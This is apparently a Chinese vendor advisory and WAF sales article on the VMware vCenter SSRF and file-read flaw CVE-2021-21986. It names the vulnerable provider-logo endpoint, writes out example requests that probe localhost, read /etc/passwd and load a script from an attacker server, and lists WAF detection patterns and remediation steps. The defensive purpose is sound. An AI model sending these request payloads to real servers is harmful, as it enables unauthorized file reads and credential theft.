一个影响 VMware vCenter Server 的高危 SSRF 漏洞,潜伏在 provider-logo 路径的 url 参数中。攻击者无需任何身份认证,仅需发送一个包含恶意 url 参数的 HTTP 请求,即可诱使 vCenter Server 访问内网敏感资源、读取任意本地文件,甚至结合其他漏洞进一步拿下服务器。该漏洞虽在 2021 年已被公开,但至今仍有大量企业未完成修复。百度云防护 WAF 内置规则 File_access.CVE-2021-21986.A(规则 ID 4306)可在流量侧精准拦截此类攻击,为企业争取宝贵的修复窗口期。
一、 漏洞核心信息
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2021-21986 |
| CVSS v3 评分 | 6.5(中危) |
| 漏洞类型 | 服务器端请求伪造(SSRF) + 任意文件读取 |
| 受影响产品 | VMware vCenter Server(VCSA) |
| 影响版本 | 7.0.x(低于 7.0 U2b)、6.7.x(低于 6.7 U3n)、6.5.x(低于 6.5 U3p),以及 Cloud Foundation 3.x/4.x |
| 攻击条件 | 无需认证、无需用户交互 |
| 利用复杂度 | 低 |
| 官方补丁 | 已发布(VMSA-2021-0010),但大量环境仍未升级 |
该漏洞与知名的 CVE-2021-21985 远程代码执行漏洞一同被 VMware 在 2021 年 5 月修复,但至今仍有大量 vCenter Server 暴露在公网且未打补丁。
二、 技术原理剖析
2.1 漏洞位置
该漏洞位于 vSphere Client 的 provider-logo 路径,具体 API 路径为:
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo正常访问时,提示 url 参数不存在。攻击者可通过构造恶意请求,向该接口传递恶意的 url 参数值。
2.2 代码缺陷根源
漏洞源于 h5-vcav-bootstrap-service 组件的 getProviderLogo 函数。该函数通过 URLConnection 读取指定 URL 并返回内容,且未对 url 参数做任何校验。
简化的漏洞逻辑如下:
- 用户请求
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=xxx - vCenter Server 后端直接以
URLConnection访问 xxx 地址 - 将获取到的内容原样返回给攻击者
这意味着:你让 vCenter 访问什么,它就访问什么,并将结果返回给你。
2.3 攻击演示
SSRF 探测:
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=http://127.0.0.1:8080/攻击者可利用该漏洞探测 vCenter 服务器可访问的任何内网端口和服务。
任意文件读取:
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd攻击者可直接读取服务器上的任意本地文件。利用该漏洞甚至可以读取 vCenter 的 postgresql 数据库配置文件,获取关键数据库凭证。
远程文件读取:
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=http://攻击者服务器/malicious.js攻击者可诱使 vCenter Server 加载外部恶意脚本,形成 XSS 或进一步渗透。
2.4 认证绕过
研究人员还发现,该 API 接口本身存在认证绕过缺陷。攻击者在未登录的情况下即可直接访问该接口,无需提供任何会话凭证,大幅降低了漏洞利用门槛。
三、 攻击场景与危害
| 攻击阶段 | 操作 | 危害 |
|---|---|---|
| 信息泄露 | 读取 /etc/passwd、数据库配置文件等本地文件 | 获取系统用户信息、数据库凭证 |
| 内网探测 | 向内网 IP 和端口发送 SSRF 请求 | 绘制内网拓扑,定位高价值目标 |
| 凭证窃取 | 读取 vCenter 数据库配置文件(vcdb.properties) | 获取数据库账号密码,进一步控制虚拟化平台 |
| 组合漏洞 | 配合 CVE-2021-21985(RCE)或其他上传漏洞 | 直接拿下服务器,控制整个虚拟化集群 |
VMware 官方曾在安全公告中特别强调:CVE-2021-21985 远程代码执行漏洞非常容易被勒索团伙利用。而 CVE-2021-21986 可作为攻击链的前置信息收集环节,帮助攻击者获取内网拓扑和敏感配置,为后续 RCE 攻击铺平道路。
四、 为什么打了补丁还是防不住?
- 补丁落地周期长:生产环境升级 vCenter Server 需要停机维护、备份数据、测试兼容性,实际操作常耗时数周甚至数月。
- 旧版本不再支持:部分企业仍在运行 6.5、6.7 等旧版本,升级到最新版本可能需要整体架构改造。
- 公网暴露严重:根据 Shodan 扫描数据,仍有大量 vCenter Server 实例直接暴露在公网上,且运行着未打补丁的旧版本。更令人担忧的是,这些暴露的实例中绝大部分运行的是已停止支持的版本,官方不再提供补丁。
结论:仅依赖官方补丁存在巨大的“空窗期”。在网络层部署 WAF 是弥补这一空窗期、保护旧版本系统的最有效手段。
五、 百度云防护 WAF:不打补丁也能拦截攻击
5.1 规则 4306 已上线,开箱即用
根据百度云防护最新内置规则库,针对 CVE-2021-21986 的专项防御规则已上线:
| 规则名称 | 规则 ID | 风险等级 | 防护类型 | 更新时间 |
|---|---|---|---|---|
| File_access.CVE-2021-21986.A | 4306 | 中风险 | 文件读取 | 2026-05-11 18:00:27 |
该规则描述明确指出:检测 VMware vCenter Server provider-logo 路径 SSRF 漏洞(CVE-2021-21986)利用,通过 url 参数读取本地文件。
接入百度云防护 WAF 后,基础防护引擎默认开启该规则,无需手动配置即可获得保护。
5.2 规则 4306 的检测逻辑
- API 路径匹配:检测对
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo等敏感路径的请求。 - url 参数深度解析:解析请求参数中的
url值,识别其中是否包含:
- 内网 IP 段(
10.0.0.0/8、172.16.0.0/12、192.168.0.0/16、127.0.0.0/8) - 云元数据地址(
169.254.169.254) - 文件读取协议(
file://) - 特殊协议(
gopher://、dict://、ftp://等)
- 多层解码防护:无论攻击者对 payload 进行 URL 编码还是双重编码,规则都能自动解码还原,使各种绕过手法全部失效。
- 实时拦截:一旦命中规则,直接返回 403 状态码,恶意请求永不抵达 vCenter Server 后端。
5.3 验证规则是否生效
登录百度云防护控制台 → 防护配置 → Web防护 → 内置规则,搜索规则 ID 4306。确认状态为“开启”,处置动作为“拦截”。若规则状态为“观察”,请手动修改为“拦截”。
5.4 更上一层的通用 SSRF 防护
除了针对 CVE-2021-21986 的专项规则,百度云防护还内置了通用 SSRF 检测规则(SSRF.target_protocol.A,规则 ID 4195),专门检测利用高危协议进行 SSRF 的 Web 攻击。该规则可识别 file://、gopher://、dict://、ftp:// 等高风险协议,以及内网地址和云元数据地址的访问行为。即使未来出现未知的 SSRF 变种漏洞,规则 4195 也能起到兜底拦截作用,形成从“专项漏洞防御”到“通用 SSRF 防御”的纵深体系。
六、 企业综合修复建议
| 优先级 | 措施 | 说明 |
|---|---|---|
| 紧急 | 开启百度云防护 WAF,确认规则 4306 生效 | 立即获得虚拟补丁,阻断攻击流量,无需修改任何代码 |
| 高 | 升级 vCenter Server 至安全版本 | 升级至 7.0 U2b、6.7 U3n 或 6.5 U3p 及以上版本 |
| 中 | 限制 API 访问来源 IP | 在防火墙或负载均衡器中仅允许可信 IP 访问 vCenter Server 的 443 端口 |
| 中 | 审计历史访问日志 | 检查 /ui/vcav-bootstrap/rest/vcav-providers/provider-logo 接口是否有异常请求记录 |
| 低 | 禁用不必要的插件 | 若暂时无法升级补丁,可参考 VMware KB 83829 禁用 vSAN 等受影响插件 |
七、 总结
CVE-2021-21986 是一个典型的“旧洞新用”高危 SSRF 漏洞。由于大量 VMware 虚拟化环境仍未打补丁,它仍然是黑客进行内网探测、窃取敏感配置、配合 RCE 漏洞拿下服务器的重要跳板。百度云防护 WAF 规则 4306(File_access.CVE-2021-21986.A) 在不修改任何代码、不中断业务的前提下,为 vCenter Server 提供了即时可用的“虚拟补丁”。配合通用 SSRF 规则 4195,可形成从专项到通用的纵深防御体系,甚至在官方不再提供补丁的 EOL 版本上也能持续提供保护。
如果你正在使用 VMware vCenter Server 且无法立刻升级,或担心内网资产被 SSRF 攻击穿透,欢迎联系主机吧。我们提供免费安全评估和百度云防护 WAF 接入指导,帮助你在补丁空窗期守住防线。
主机吧 | 百度云防护官方合作伙伴
提供 WAF 接入、高防 CDN、高防 IP、高防服务器、SSL 证书一站式服务
让每一次 SSRF 攻击都无处遁形,让每一台虚拟化服务器都固若金汤。
